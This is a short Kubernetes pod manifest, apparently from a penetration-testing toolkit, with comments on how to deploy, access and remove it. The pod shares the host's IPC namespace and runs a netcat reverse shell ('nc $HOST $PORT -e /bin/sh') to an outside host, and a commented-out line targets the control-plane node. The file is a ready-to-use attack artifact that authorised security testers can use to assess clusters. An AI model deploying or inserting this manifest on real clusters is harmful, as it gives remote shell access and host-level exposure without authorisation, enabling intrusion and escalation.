###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostipc-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostipc-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-hostipc-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostipc-revshell
  labels:
    app: pentest
spec:
  hostIPC: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    name: hostipc--revshell
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node